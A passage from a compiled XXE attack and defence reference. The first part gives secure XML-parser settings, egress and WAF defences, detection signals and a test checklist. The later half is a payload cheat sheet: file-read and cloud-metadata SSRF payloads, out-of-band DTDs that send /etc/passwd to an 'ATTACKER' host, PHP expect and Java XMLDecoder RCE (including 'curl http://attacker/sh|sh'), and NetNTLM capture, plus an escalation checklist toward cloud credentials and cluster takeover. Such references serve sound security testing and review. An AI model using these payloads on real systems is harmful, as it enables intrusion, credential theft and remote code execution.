        libxml_disable_entity_loader(false)      # explicit re-enable

Ruby    Nokogiri::XML(input) { |c| c.noent.dtdload }
        REXML::Document.new(input)

Node    new xmldom.DOMParser()                   # check for entityExpansionLimit
        xml2js.parseString(..., { explicitCharkey: true })

16.2 Secure-by-default recipes

Java:

DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
dbf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
dbf.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
dbf.setXIncludeAware(false);
dbf.setExpandEntityReferences(false);

.NET ≥ 4.5.2:

var settings = new XmlReaderSettings {
    DtdProcessing = DtdProcessing.Prohibit,
    XmlResolver   = null
};
using var reader = XmlReader.Create(stream, settings);

Python:

from defusedxml import ElementTree as ET   # blocks DTD by default
root = ET.fromstring(xml_bytes)

or native lxml:

parser = lxml.etree.XMLParser(
    resolve_entities=False,
    no_network=True,
    load_dtd=False,
    dtd_validation=False,
    huge_tree=False,
)

PHP (modern):

$doc = new DOMDocument();
$doc->loadXML($xml);     // safe in PHP 8+ — DOCTYPE disabled by default

Avoid LIBXML_NOENT and LIBXML_DTDLOAD unless absolutely required.

Ruby / Nokogiri:

Nokogiri::XML(input)     # safe defaults; do not add .noent or .dtdload

16.3 Network & runtime defences

  • Egress-filter the app server: block outbound file:// is implicit, block 169.254.169.254, block arbitrary outbound HTTP from parser contexts.
  • IMDSv2 (AWS) — force HttpTokens=required.
  • Container egress: default-deny, allowlist specific hostnames only.
  • WAF rules that block <!DOCTYPE / <!ENTITY on non-XML endpoints and strip them on XML endpoints that don’t need DTD.
  • Suppress detailed parser errors in production responses (kills error-based variants).
  • Sandbox file-format processors (ImageMagick policy.xml, LibreOffice profile, SVG rasterisers) in containers without filesystem/network access.

16.4 Logging / detection signals

  • XML parser error logs mentioning external entity, SYSTEM, DOCTYPE.
  • Outbound DNS/HTTP from application servers to unknown domains.
  • Requests that include <!DOCTYPE on endpoints that historically received pure-data XML.
  • Access to /proc/self/environ, /etc/passwd, /root/.ssh/ by parser processes.
  • Sudden spikes in heap / CPU — possible billion-laughs.

16.5 Test checklist

  1. Send <!DOCTYPE r [<!ENTITY x "test">]><r>&x;</r> — does test appear? Entities enabled.
  2. Send OOB probe with Collaborator — do callbacks land? External resolution enabled.
  3. Send parameter-entity probe — does the remote DTD get fetched? PE expansion enabled.
  4. Send classic file read — is content reflected?
  5. Send FTP/HTTP exfil via remote DTD — captures data?
  6. Send error payload with bad path — does response include filename fragment?
  7. Send jar:// probe (Java) — does temp file appear?
  8. Send billion-laughs with low iteration — does the service degrade? Back off if yes.
  9. File-format wrappers — SVG avatar, DOCX upload, SAML metadata, RSS feed import.
  10. JSON→XML swap on every JSON endpoint that returns data.

17. Payload Quick Reference

17.1 Detection probes

<!-- Local entity round-trip -->
<!DOCTYPE r [<!ENTITY t "entity-works">]><r>&t;</r>

<!-- OOB via general entity -->
<!DOCTYPE r [<!ENTITY p SYSTEM "http://COLLAB/g">]><r>&p;</r>

<!-- OOB via parameter entity (catches stricter parsers) -->
<!DOCTYPE r [<!ENTITY % p SYSTEM "http://COLLAB/p"> %p;]><r/>

17.2 File read

<!DOCTYPE r [<!ENTITY x SYSTEM "file:///etc/passwd">]><r>&x;</r>
<!DOCTYPE r [<!ENTITY x SYSTEM "file:///c:/windows/win.ini">]><r>&x;</r>
<!DOCTYPE r [<!ENTITY x SYSTEM "file:///proc/self/environ">]><r>&x;</r>
<!DOCTYPE r [<!ENTITY x SYSTEM "php://filter/convert.base64-encode/resource=index.php">]><r>&x;</r>
<!DOCTYPE r [<!ENTITY x SYSTEM "netdoc:///etc/passwd">]><r>&x;</r>
<!DOCTYPE r [<!ENTITY x SYSTEM "jar:file:///tmp/a.jar!/b.txt">]><r>&x;</r>

17.3 SSRF

<!DOCTYPE r [<!ENTITY x SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">]><r>&x;</r>
<!DOCTYPE r [<!ENTITY x SYSTEM "http://127.0.0.1:6379/">]><r>&x;</r>
<!DOCTYPE r [<!ENTITY x SYSTEM "http://[::1]/">]><r>&x;</r>

17.4 Blind OOB external DTD

Victim:

<!DOCTYPE r [<!ENTITY % dtd SYSTEM "http://ATTACKER/evil.dtd"> %dtd;]><r/>

evil.dtd (HTTP channel):

<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % wrap "<!ENTITY &#x25; exfil SYSTEM 'http://ATTACKER/?x=%file;'>">
%wrap;
%exfil;

evil.dtd (FTP channel for multiline files):

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % wrap "<!ENTITY &#x25; exfil SYSTEM 'ftp://a:%file;@ATTACKER/'>">
%wrap;
%exfil;

17.5 Error-based (external DTD)

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; err SYSTEM 'file:///nope/%file;'>">
%eval;
%err;

17.6 Error-based (local DTD — GNOME yelp)

<!DOCTYPE r [
  <!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
  <!ENTITY % ISOamso '
    <!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
    <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; err SYSTEM &#x27;file:///nope/&#x25;file;&#x27;>">
    &#x25;eval;
    &#x25;err;
  '>
  %local_dtd;
]>
<r/>

17.7 lxml meow:// bypass

<!DOCTYPE r [
  <!ENTITY % a '
    <!ENTITY % file SYSTEM "file:///tmp/flag.txt">
    <!ENTITY % b "<!ENTITY c SYSTEM &#x27;meow://%file;&#x27;>">
  '>
  %a; %b;
]>
<r>&c;</r>

17.8 XInclude

<foo xmlns:xi="http://www.w3.org/2001/XInclude">
  <xi:include parse="text" href="file:///etc/passwd"/>
</foo>

17.9 SVG upload

<?xml version="1.0"?>
<!DOCTYPE svg [<!ENTITY x SYSTEM "file:///etc/hostname">]>
<svg xmlns="http://www.w3.org/2000/svg" width="200" height="40">
  <text y="20">&x;</text>
</svg>

17.10 SOAP

<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <payload><![CDATA[<!DOCTYPE d [<!ENTITY x SYSTEM "file:///etc/passwd">]><d>&x;</d>]]></payload>
  </soap:Body>
</soap:Envelope>

17.11 PHP RCE via expect

<!DOCTYPE r [<!ENTITY x SYSTEM "expect://id">]><r>&x;</r>

17.12 Java XMLDecoder RCE

<?xml version="1.0"?>
<java version="1.7.0_21" class="java.beans.XMLDecoder">
  <object class="java.lang.ProcessBuilder">
    <array class="java.lang.String" length="3">
      <void index="0"><string>/bin/sh</string></void>
      <void index="1"><string>-c</string></void>
      <void index="2"><string>curl http://attacker/sh|sh</string></void>
    </array>
    <void method="start"/>
  </object>
</java>

17.13 Windows NetNTLMv2 capture

<!DOCTYPE r [<!ENTITY x SYSTEM "file:////ATTACKER-IP/share/a.jpg">]><r>&x;</r>

17.14 Billion laughs

<!DOCTYPE lolz [
  <!ENTITY a0 "lol">
  <!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;">
  <!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;">
  <!ENTITY a3 "&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;">
  <!ENTITY a4 "&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;">
]>
<lolz>&a4;</lolz>

17.15 UTF-7 encoded DOCTYPE

<?xml version="1.0" encoding="UTF-7"?>
+ADwAIQ-DOCTYPE foo+AFs +ADwAIQ-ENTITY xxe SYSTEM +ACI-file:///etc/passwd+ACI +AD4AXQA+
+ADw-foo+AD4AJg-xxe+ADsAPA-/foo+AD4

Appendix A — High-value local DTDs

OS / PackagePathOverridable entity
GNOME yelp/usr/share/yelp/dtd/docbookx.dtdISOamso, ISOnum
fontconfig/usr/share/xml/fontconfig/fonts.dtdconstant
Xalan (Java)xalan2.jar!/org/apache/xalan/res/XSLTInfo.propertiesvarious
IBM WebSphere$WAS/properties/schemas/j2ee/XMLSchema.dtdWebSphere-specific
MicrosoftC:\Windows\System32\wbem\xml\cim20.dtdSuperClassName
Red Hat / CentOS/usr/share/xml/scrollkeeper/dtds/scrollkeeper-omf.dtd
Tomcatjsp-api.jar!/jakarta/servlet/jsp/resources/jspxml.dtd

Full list: https://github.com/GoSecure/dtd-finder/tree/master/list


Appendix B — Fingerprinting checklist before escalating

  1. Does the target reflect XML? → test in-band file read.
  2. Does the parser fetch remote DTDs? → OOB exfil.
  3. Does it return parser errors? → error-based.
  4. Egress-filtered? → local-DTD error-based.
  5. Java fingerprint (Server header, cookie, error trace)? → jar:, netdoc:, XMLDecoder, XSLT RCE.
  6. PHP fingerprint? → php://filter, expect://.
  7. .NET fingerprint? → check XmlResolver / DtdProcessing code patterns; pre-4.5.2 is default-vulnerable.
  8. File-upload feature? → SVG / DOCX / XLSX / SAML / RSS wrapper.
  9. Windows host? → SMB NetNTLM hash capture.
  10. Is the XML in a privileged context (root, cloud IAM, K8s service account)? → pivot to secrets, cloud creds, cluster takeover.

References

Key source articles (from raw/XXE/):

  • HackTricks — XXE / XEE / XML External Entity (definitive cheat sheet).
  • GoSecure — Advanced XXE Exploitation workshop.
  • PortSwigger — Blind XXE labs and writeups.
  • PVS-Studio — XXE in C# applications (parser defaults, BlogEngine.NET case).
  • OWASP — XML External Entity Prevention Cheat Sheet.
  • Detectify Labs — Obscure XXE attacks (Office Open XML).
  • honoki.net — From blind XXE to root-level file read.
  • Horizon3.ai — From support ticket to zero day (Xerox FreeFlow Core JMF XXE → SSRF → RCE).
  • OffSec — CVE-2025-27136 LocalS3 XXE.
  • pwn.vg — Local file read via error-based XXE (XLIFF).
  • YesWeHack — Bug bounty XXE guide + Dojo CTF #42 write-up.
  • HackerOne / Bugcrowd — XXE complete guide.
  • HLOverflow — XXE-study apps (PHP vulnerable server source).
  • enjoiz — XXEinjector (Ruby automation).
  • luisfontes19 — xxexploiter (TS payload + server).
  • BuffaloWill — oxml_xxe (file-format wrapper generator).
  • GoSecure — dtd-finder (local-DTD discovery).
  • Swarm / PT Security — Impossible XXE in PHP (WrapWrap / Lightyear bypass).
  • Cisco / Akamai / Apache / Grav — vendor advisories for real CVEs referenced above.

Compiled for defensive security research, variant hunting, and secure-code review reference.